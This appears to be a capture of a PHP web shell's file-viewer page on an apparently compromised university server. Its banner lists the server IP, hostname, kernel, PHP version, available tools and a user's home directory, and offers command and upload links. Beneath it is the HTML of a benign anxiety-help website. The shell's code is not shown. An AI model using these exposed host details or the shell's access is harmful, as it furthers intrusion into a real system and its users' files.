Server IP : 172.16.15.8 / Your IP : 18.119.122.140 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/jlsnowden/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body,html {font-family: Arial, Helvetica, sans-serif; height:100%; margin:0; } * {box-sizing: border-box;} .bg-img { /* The image used */ background-image: url("0719_Anxiety-and-Arthritis-768x512.jpg "); height: 100%; /* Center and scale the image nicely */ background-position: center; background-repeat: no-repeat; background-size: cover; /* Needed to position the navbar */ position: relative; } /* Position the navbar container inside the image */ .container { position: absolute; margin: 20px; width: auto; } /* The navbar */ .topnav { overflow: hidden; background-color: #333; } /* Navbar links */ .topnav a { float: left; color: #f2f2f2; text-align: center; padding: 14px 16px; text-decoration: none; font-size: 17px; } .topnav a:hover { background-color: #ddd; color: black; } </style> </head> <body> <div class="bg-img"> <center> <font size="10"> <h1>Be Anxious For Nothing<h1> <p> <h3> The site designed to help you gain back your peace of mind</h3> </font> </center> <div class="container"> <div class="topnav"> <A HREF=AFNabout.html> About </A> <A HREF=AFNtypes.html> Types of Anxiety</A> <A HREF=AFNtech.html> Techniques to Manage Anxiety</A> <A HREF=AFNoptions.html> Other Options</A> <A HREF=AFNtips.html> Submit tips </A> <A HREF=AFNadmin.html> Admin Login </A> </div> </div> </div> </body> </html>